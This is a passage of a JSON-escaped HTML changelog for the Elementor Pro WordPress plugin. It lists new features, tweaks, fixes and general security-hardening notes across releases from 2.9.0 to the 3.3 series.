href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14229\\\">#14229<\\/a>)<\\/li>\\n<li>Tweak: Added future support for Sticky JS library conditional loading<\\/li>\\n<li>Tweak: Added future support for Import \\/ Export experiment<\\/li>\\n<li>Tweak: Preparations and fixes for Import Export Experiment in Pro version<\\/li>\\n<li>Tweak: Added gradient button capabilities to Login widget buttons<\\/li>\\n<li>Tweak: Added gradient button capabilities to Slides widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Price Table widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Flip Box widget button<\\/li>\\n<li>Tweak: Added Code Highlight widget Developers Documentation<\\/li>\\n<li>Tweak: Adjusted Submissions page for future updates<\\/li>\\n<li>Tweak: Added <code>em<\\/code> and <code>%<\\/code> units for padding control in Carousel widgets<\\/li>\\n<li>Tweak: Shorten currency name to currency symbol in PayPal button widget<\\/li>\\n<li>Fix: Custom Fonts URLs should be replaced when replace URL is triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7376\\\">#7376<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10382\\\">#10382<\\/a>)<\\/li>\\n<li>Fix: The currency symbol size changed in the Price Table widget if enabling sale (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13519\\\">#13519<\\/a>)<\\/li>\\n<li>Fix: Nav Menu widget is not loading Font Awesome submenu icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9907\\\">#9907<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle is not working in Nav menu widget<\\/li>\\n<li>Fix: Activation bug for IDN domains<\\/li>\\n<li>Fix: Conditions modal responsive glitches in Custom Code<\\/li>\\n<li>Fix: Duplicated strings in Custom Code module<\\/li>\\n<li>Fix: Enable resize option for code input field in Custom Code<\\/li>\\n<li>Fix: \\u201cSave & Close \\u201cbutton in Custom Code\'s Conditions modal was not visible on small screen sizes<\\/li>\\n<li>Fix: Removing a column from a section in the navigator resulted in an empty section<\\/li>\\n<li>Fix: Recommend option is cut If the layout is not "Standard" in the Facebook Button widget<\\/li>\\n<li>Fix: Video item does not play without adding an image in Media Carousel widget<\\/li>\\n<li>Fix: <code>search-plus<\\/code> icon missing from panel in Media Carousel widget<\\/li>\\n<li>Fix: UI hover state glitch in Media Carousel widget<\\/li>\\n<li>Fix: PHP notice was thrown when trying to import a kit without overrideConditions parameter in Kit Import flow<\\/li>\\n<li>Fix: Templates conditions not imported if there are no conflicts in Import Export Experiment<\\/li>\\n<li>Fix: Non english values are not encoded properly on Submissions export<\\/li>\\n<li>Fix: Theme Builder import is not working properly<\\/li>\\n<li>Fix: UI glitch when no global widgets were found in Editor Panel<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-3-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.2.2 - 2021-05-05<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Expert tier templates in Templates Library<\\/li>\\n<li>Tweak: Updated compatibility tag to support Elementor v3.2.x<\\/li>\\n<li>Tweak: Added compatibility for future Library improvements<\\/li>\\n<li>Fix: Toolset image dynamic field is not working with Gallery widget<\\/li>\\n<\\/ul>\\n<h4>3.2.1 - 2021-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added strings context in PayPal button and Price Table widgets<\\/li>\\n<li>Tweak: Added support for future Import \\/ Export Kit feature<\\/li>\\n<li>Fix: Submissions with over than 191 characters weren\'t indexed properly<\\/li>\\n<\\/ul>\\n<h4>3.2.0 - 2021-03-14<\\/h4>\\n<ul>\\n<li>New: PayPal Button widget - Collect PayPal payments directly from your site<\\/li>\\n<li>Experiment: Submissions - Save all of your form submissions in one place (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1686\\\">#1686<\\/a>)<\\/li>\\n<li>Tweak: Added Stay In Column option to Inner Section element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7956\\\">#7956<\\/a>)<\\/li>\\n<li>Tweak: Adjusted \'Max Height\' control range in Table of Contents widget<\\/li>\\n<li>Tweak: Changed descriptive text in Create Custom Code screen<\\/li>\\n<li>Tweak: Added support for dynamic capabilities in Code Highlight widget<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>share-link<\\/code> library<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>dialog<\\/code> library in Popup<\\/li>\\n<li>Tweak: Allow overwriting the assets URL when using a mirror domain<\\/li>\\n<li>Fix: Animation was triggered multiple times when accessing the viewport in certain cases in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13951\\\">#13951<\\/a>)<\\/li>\\n<li>Fix: Location is not being updated after a Custom Code snippet is published (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13971\\\">#13971<\\/a>)<\\/li>\\n<li>Fix: Custom Fonts CSS files were not updated after regenerating CSS files<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: Empty order buttons are displayed in Custom Fonts screen<\\/li>\\n<li>Fix: Typo in \'Reply To\' Email action after submit placeholder in Forms widget<\\/li>\\n<li>Fix: Unnecessary Save Draft button in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Custom Code<\\/li>\\n<li>Fix: Sanitized options in the editor to enforce better security policies<\\/li>\\n<li>Deprecated: See all deprecations to this version in our (<a href=\\\"https:\\/\\/developers.elementor.com\\/v3-2-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.1.1 - 2021-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted \'Max Height\' control range in Table of Contents widget<\\/li>\\n<li>Fix: Popup event handler is undefined (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11475]\\\">#11475<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10690\\\">#10690<\\/a>)<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Code Highlight widget<\\/li>\\n<li>Fix: Minor UI glitches in Code Highlight widget<\\/li>\\n<li>Fix: Users can\'t get Pro Developer Edition version updates<\\/li>\\n<\\/ul>\\n<h4>3.1.0 - 2021-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Code - Add custom code snippets to your site, including <code>head<\\/code>, <code>body<\\/code> start and <code>body<\\/code> end<\\/li>\\n<li>New: Meet Code Highlight widget - showcase any syntax with highlighted UI (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5815\\\">#5815<\\/a>)<\\/li>\\n<li>Experiment: Improved Pro widgets performance by loading JS and Swiper assets conditionally in frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/experiment-optimized-asset-loading\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Compatibility Tag support in Elementor Pro (<a href=\\\"https:\\/\\/developers.elementor.com\\/compatibility-tag\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Rotating Text animation in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4625\\\">#4625<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added an option to set Selected color for Typing effect in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5403\\\">#5403<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7826\\\">#7826<\\/a>)<\\/li>\\n<li>Tweak: Added animation Loop option for Animated Headline (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9749\\\">#9749<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2457\\\">#2457<\\/a>)<\\/li>\\n<li>Tweak: Added timing options for Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4392\\\">#4392<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added Word Wrap control to Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13577\\\">#13577<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.15.1<\\/li>\\n<li>Tweak: Improved method of loading field mapping repeater in Form widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/how-to-add-a-repeater-control-to-elementor-add-on\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added "Show on Browsers" Popup Advanced Rule<\\/li>\\n<li>Tweak: Added real-time JS handling to prevent redundant renders in Slides widget and all Carousel widgets<\\/li>\\n<li>Tweak: Import scroll utility from core and remove it from Pro<\\/li>\\n<li>Tweak: Added alignment options for Post Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9757\\\">#9757<\\/a>)<\\/li>\\n<li>Tweak: Changed alignment control to work with selectors in Share Buttons<\\/li>\\n<li>Tweak: Upgraded to Webpack 5, Grunt-Webpack 4 and TerserPlugin instead of UglifyJsPlugin<\\/li>\\n<li>Fix: Steps Divider is not vertically aligned in Multi Step Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12569\\\">#12569<\\/a>)<\\/li>\\n<li>Fix: Slides are playing in an infinite loop mode even when the option is disabled in Slides Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Redundant spacing is added to Share Buttons widget<\\/li>\\n<li>Fix: Step buttons text is not updated without a page reload in Forms widget<\\/li>\\n<li>Fix: Overflow issue in certain animations in Animated Headline widget<\\/li>\\n<li>Fix: When dragging a new Testimonial Carousel there is a console error thrown<\\/li>\\n<li>Fix: Step Buttons are cut in mobile view in Multi Step Form<\\/li>\\n<li>Fix: Submit and Step buttons size differences when using Twenty Twenty theme<\\/li>\\n<li>Fix: Duplicate button Text Color control in Slides widget<\\/li>\\n<li>Fix: JS error is thrown when editing and saving global widgets<\\/li>\\n<li>Fix: <code>get_version<\\/code> API function may fail with Redis \\/ DB cache<\\/li>\\n<li>Fix: Multiple license check requests are created in certain cases<\\/li>\\n<li>Deprecated: Deprecate methods prefixed with an underscore and replace them with unprefixed methods<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-1-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.0.10 - 2021-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Added Editing Handles string translation compatibility with Elementor v3.1.0<\\/li>\\n<\\/ul>\\n<h4>3.0.9 - 2020-12-29<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility to support Elementor 3.1.0<\\/li>\\n<li>Fix: Wrong phrasing of Import template success message in Theme Builder<\\/li>\\n<li>Fix: Border color glitch in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.8 - 2020-11-26<\\/h4>\\n<ul>\\n<li>Fix: Navigation arrows UI glitch in Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13172\\\">#13172<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.0.7 - 2020-11-25<\\/h4>\\n<ul>\\n<li>Fix: Console Error when dragging Testimonials Carousel widget<\\/li>\\n<li>Fix: Arrows of Testimonial and Reviews Carousel widgets navigate to the wrong direction in RTL websites<\\/li>\\n<li>Fix: Removed the conditional loading of Webpack<\\/li>\\n<li>Fix: Fatal error is thrown after deleting an associated custom taxonomy when Posts widget with Cards skin has a badge<\\/li>\\n<li>Fix: Upload JSON files only when the user allowed to prevent security issues<\\/li>\\n<li>Fix: Gallery not displayed in Theme Builder templates preview<\\/li>\\n<\\/ul>\\n<h4>3.0.6 - 2020-11-04<\\/h4>\\n<ul>\\n<li>Tweak: Updated the embedded post in Facebook Embed widget<\\/li>\\n<li>Fix: Minor UI glitches in Theme Builder\'s conditions screen footer<\\/li>\\n<li>Fix: Template type changes into Single Page after conditions change in Theme Builder<\\/li>\\n<li>Fix: Redundant Custom Caption option in Site Logo widget<\\/li>\\n<li>Fix: Removed unused code in Drip integration<\\/li>\\n<li>Fix: Removed Weibo and WeChat social networks due to website and links inactivity from Share Buttons widget<\\/li>\\n<li>Fix: Removed redundant code from Portfolio and Post Navigation widgets<\\/li>\\n<\\/ul>\\n<h4>3.0.5 - 2020-09-23<\\/h4>\\n<ul>\\n<li>Fix: If the default page layout is set to "Canvas" Headers and Footers cannot be edited<\\/li>\\n<li>Fix: Product Image Dynamic Tag throws an error when no image is set<\\/li>\\n<li>Fix: Missing Single document placeholder in Theme Builder<\\/li>\\n<li>Fix: Document editing handles inherit the <code>font-family<\\/code> from 3rd party source<\\/li>\\n<li>Fix: Can\'t add linebreaks to Textarea input when used as Multi Step Form<\\/li>\\n<li>Fix: Incorrect width in Facebook Page widget<\\/li>\\n<li>Fix: Added compatibility to allow the use of \'get_create_url\' in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.4 - 2020-09-09<\\/h4>\\n<ul>\\n<li>Fix: Autogenerated screenshots appear in WP Media Library modal (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12304\\\">#12304<\\/a>)<\\/li>\\n<li>Fix: Make sure Elementor Posts widget Pagination doesn\'t interfere with 3rd party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Shrinking conditions indicator in Theme Builder<\\/li>\\n<li>Fix: Column can\'t be dragged and dropped if it populates a Global widget<\\/li>\\n<li>Fix: Styles are missing from Single templates in some edge cases<\\/li>\\n<\\/ul>\\n<h4>3.0.3 - 2020-09-02<\\/h4>\\n<ul>\\n<li>Fix: Pagination doesn\'t work in WordPress 5.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Change delete template action to "Move to Trash" in the new Theme Builder view<\\/li>\\n<\\/ul>\\n<h4>3.0.2 - 2020-08-31<\\/h4>\\n<ul>\\n<li>Tweak: Replaced WordPress "Learn More" links with dynamic links for better control over time (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12312\\\">#12312<\\/a>)<\\/li>\\n<li>Tweak: UI tweaks to the Conditions screen In the new Theme Builder<\\/li>\\n<li>Fix: Motion Effects not working when assigned to a column and throws JS error when DOM optimization is disabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12299\\\">#12299<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12275\\\">#12275<\\/a>)<\\/li>\\n<li>Fix: Multiple Galleries display all the images in the Lightbox slideshow (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11809\\\">#11809<\\/a>)<\\/li>\\n<li>Fix: Old Theme Builder is being opened when accessing through the Finder<\\/li>\\n<li>Fix: Mixed templates import glitch in Theme Builder<\\/li>\\n<li>Fix: Card icon sizes in Theme Builder<\\/li>\\n<li>Fix: Preview button leads to <code>render_mode<\\/code> instead of preview when importing a template from the new Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.1 - 2020-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Keep previous Theme Builder when accessing from the WP Dashboard for legacy support<\\/li>\\n<li>Tweak: Updated video tutorials in Theme Builder<\\/li>\\n<li>Tweak: Don\'t show auto-screenshots in the Media Library (Props <a href=\\\"https:\\/\\/github.com\\/black-eye\\\">@black-eye<\\/a>)<\\/li>\\n<li>Fix: Repeater items throws <code>childView<\\/code> is undefined message in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12239\\\">#12239<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12221\\\">#12221<\\/a>)<\\/li>\\n<li>Fix: Misspelling of the word "occurred" in Form widget default error message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12137\\\">#12137<\\/a>)<\\/li>\\n<li>Fix: Facebook comments not showing up (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12157\\\">#12157<\\/a>)<\\/li>\\n<li>Fix: Check for conflicts in Theme Builder doesn\'t work properly<\\/li>\\n<li>Fix: Minor UI fixes in Theme Builder<\\/li>\\n<li>Fix: Dark mode glitches in Theme Builder<\\/li>\\n<li>Fix: Global Site Part toaster appears when you publish a Popup<\\/li>\\n<li>Fix: Site Parts aren\'t in the correct order in Theme Builder<\\/li>\\n<li>Fix: Date field caused forms to get corrupted in Forms widget<\\/li>\\n<li>Fix: Theme Builder application page is forbidden<\\/li>\\n<\\/ul>\\n<h4>3.0.0 - 2020-08-23<\\/h4>\\n<ul>\\n<li>New: Introducing the new and improved Theme Builder<\\/li>\\n<li>Tweak: Removed <code>.elementor-inner<\\/code> and <code>.elementor-column-wrap<\\/code> from DOM output to improve performance (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7351\\\">#7351<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7817\\\">#7817<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/dom-improvements-ahead-html-wrappers-removal-from-v3-0\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added contextual anchors ID support to Table of Contents widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10052\\\">#10052<\\/a>)<\\/li>\\n<li>Tweak: Added WeChat and Weibo social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11554\\\">#11554<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Redirect after Login\\/Logout in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11343\\\">#11343<\\/a>)<\\/li>\\n<li>Tweak: Added Blend Mode and CSS Filters controls to adjust the Background Overlay in Flipbox widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11653\\\">#11653<\\/a>)<\\/li>\\n<li>Tweak: Added responsive capabilities to Toggle Button styling in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8269\\\">#8269<\\/a>)<\\/li>\\n<li>Tweak: Added responsive Text Alignment control in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11968\\\">#11968<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic content to Ribbon element in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10364\\\">#10364<\\/a>)<\\/li>\\n<li>Tweak: Converted uses of Color and Typography Schemes to Global Colors and Fonts<\\/li>\\n<li>Tweak: Separated Title and Description control fields labels in Call to Action widget<\\/li>\\n<li>Tweak: Removed unnecessary style in WC Product with variations<\\/li>\\n<li>Tweak: Converted Portfolio, Posts and Share Buttons widgets to use CSS Variable-based Elementor Grid (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-dropping-support-ie\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Date Modified option to Posts widget metadata<\\/li>\\n<li>Fix: PHP 7.4 compatibility to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11355\\\">#11355<\\/a>)<\\/li>\\n<li>Fix: Divider alignment issue in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11628\\\">#11628<\\/a>)<\\/li>\\n<li>Fix: Color doesn\\u2019t change in Products Archive Description widget<\\/li>\\n<li>Fix: WC Product variations layout breaks when using Variation Swatches plugin<\\/li>\\n<li>Fix: WC Product variations layout issue<\\/li>\\n<li>Fix: WC Product variations mobile zoom-in glitch<\\/li>\\n<li>Fix: Can\'t edit a Popup after accessing Theme Style<\\/li>\\n<li>Fix: Twitter icon missing in Blockquote widget<\\/li>\\n<li>Fix: Removed redundant default text color from Share Buttons minimal skin<\\/li>\\n<li>Fix: UI glitch in Display Conditions modal<\\/li>\\n<li>Fix: Insert template button UI glitch in Templates Library<\\/li>\\n<li>Fix: Added sanitization to post titles in WordPress dashboard for better security<\\/li>\\n<li>Fix: Show when arriving from search engines rule doesn\'t work in Popup<\\/li>\\n<li>Fix: Child categories are shown with a different parent category in Query control<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.10.3 - 2020-06-29<\\/h4>\\n<ul>\\n<li>Fix: Form not being submitted when using "Progress Bar" and "None" view types in Multi Step Form (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11596\\\">#11596<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11610\\\">#11610<\\/a>)<\\/li>\\n<li>Fix: Missing "for" attribute in Password field label in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8646\\\">#8646<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.2 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Fix: Run step events only when in Multi Step Form mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11644\\\">#11644<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.1 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Changed control labels and ordering in Price Table, Lottie and Form widgets<\\/li>\\n<li>Fix: Popup close button vertical position glitch (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10921\\\">#10921<\\/a>)<\\/li>\\n<li>Fix: Radio field placement glitch when in Multi Step mode in Form widget<\\/li>\\n<li>Fix: Clicking <code>Enter<\\/code> key submits the form in Multi Step Form<\\/li>\\n<li>Fix: Hardened sanitization in Custom Attributes to avoid security issues<\\/li>\\n<\\/ul>\\n<h4>2.10.0 - 2020-06-07<\\/h4>\\n<ul>\\n<li>New: Introducing Multi-Step Forms - Breakdown long forms into simple steps (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5975\\\">#5975<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3911\\\">#3911<\\/a>)<\\/li>\\n<li>New: Introducing Lottie widget - easily add Lottie animations to your site, no coding needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11026\\\">#11026<\\/a>)<\\/li>\\n<li>Tweak: Added spacing option to Posts widget pagination (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5682\\\">#5682<\\/a>)<\\/li>\\n<li>Tweak: Changed texts and logic for administrator plugin renewal notices<\\/li>\\n<li>Tweak: Added new Scroll Util for improved scrolling handling<\\/li>\\n<li>Tweak: Improved Motion Effects animation performance<\\/li>\\n<\\/ul>\\n<h4>2.9.5 - 2020-05-24<\\/h4>\\n<ul>\\n<li>Fix: Added sanitization to Custom Attributes control to avoid security issue<\\/li>\\n<\\/ul>\\n<h4>2.9.4 - 2020-05-07<\\/h4>\\n<ul>\\n<li>Fix: Hardened user role that is allowed to upload icon sets and unzip only allowed files in Custom Icons to prevent security vulnerability<\\/li>\\n<\\/ul>\\n<h4>2.9.3 - 2020-04-19<\\/h4>\\n<ul>\\n<li>Fix: Form shortcode IDs are not wrapped in double-quotes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11023\\\">#11023<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10932\\\">#10932<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10967\\\">#10967<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11000\\\">#11000<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11049\\\">#11049<\\/a>)<\\/li>\\n<li>Fix: Escaped Form records metadata to prevent security vulnerability<\\/li>\\n<li>Fix: Closing "Save Changes" document confirmation modal causes Panel infinite loading<\\/li>\\n<li>Fix: Ken Burns effect not working when there is only one slide in Slides widget<\\/li>\\n<li>Fix: Document handles UI glitch<\\/li>\\n<\\/ul>\\n<h4>2.9.2 - 2020-03-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility with WordPress v5.4 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10745\\\">#10745<\\/a>)<\\/li>\\n<li>Fix: Image ratio number is displayed under the Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10874\\\">#10874<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color setting overrides the Table of Content list style<\\/li>\\n<li>Fix: PHP notice when using dynamic user info <code>id<\\/code><\\/li>\\n<li>Fix: Navigation arrows direction is crossed on first drag in Slides Widget<\\/li>\\n<li>Fix: "No headings were found on this page" message was not displayed in the frontend in Table of Contents widget<\\/li>\\n<li>Fix: Container includes Popup tags by default in Table of Contents widget<\\/li>\\n<li>Fix: Twitter icon display issue when Font Awesome 4 support is disabled in Blockquote widget<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<\\/ul>\\n<h4>2.9.1 - 2020-03-16<\\/h4>\\n<ul>\\n<li>Fix: Can\'t access Elementor Editor when there is Page Title widget in the page<\\/li>\\n<li>Fix: Applying styling to Post Content widget affects the Page and Post editing handles<\\/li>\\n<\\/ul>\\n<h4>2.9.0 - 2020-03-15<\\/h4>\\n<ul>\\n<li>New: Introducing Full Site Editing: Design header, footer, and content all in one place! (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4985\\\">#4985<\\/a>)<\\/li>\\n<li>New: Added Global Custom CSS for Your Entire Site in Theme Style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3345\\\">#3345<\\/a>)<\\/li>\\n<li>New: Added Dynamic Colors tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6485\\\">#6485<\\/a>)<\\/li>\\n<li>Tweak: Added option to set the Site Part HTML Wrapper Tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9293\\\">#9293<\\/a>)<\\/li>\\n<li>Tweak: Added Link Attributes support to Pro widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5716\\\">#5716<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3642\\\">#3642<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9225\\\">#9225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9079\\\">#9079<\\/a>)<\\/li>\\n<li>Tweak: Added Theme Style support in Theme Builder parts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10564\\\">#10564<\\/a>)<\\/li>\\n<li>Tweak: Avoid creating empty Custom Font<\\/li>\\n<li>Tweak: Added <code>aria-expanded<\\/code> attribute to Menu Cart widget<\\/li>\\n<li>Tweak: Moved Link Actions module to Core plugin<\\/li>\\n<li>Tweak: Changed the name of \\u201cTypeKit Web Fonts by Adobe\\u201d to \\u201cAdobe Fonts\\u201d<\\/li>\\n<li>Tweak: Removed redundant display conditions from Blockquote, Flipbox, Price Table, and Search Form widgets<\\/li>\\n<li>Tweak: Pro widgets are not draggable unless Elementor license has been activated<\\/li>\\n<li>Tweak: Remove redundant <code>label_block<\\/code> parameters from several controls<\\/li>\\n<li>Tweak: Converted controls selectors to CSS variables in Gallery widget<\\/li>\\n<li>Tweak: Replaced Stumbleupon with Mix in Reviews widget recommended icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added Mix to the Share Buttons network list (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added "Open in new tab" option to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7924\\\">#7924<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.12.0<\\/li>\\n<li>Tweak: Added new Lightbox 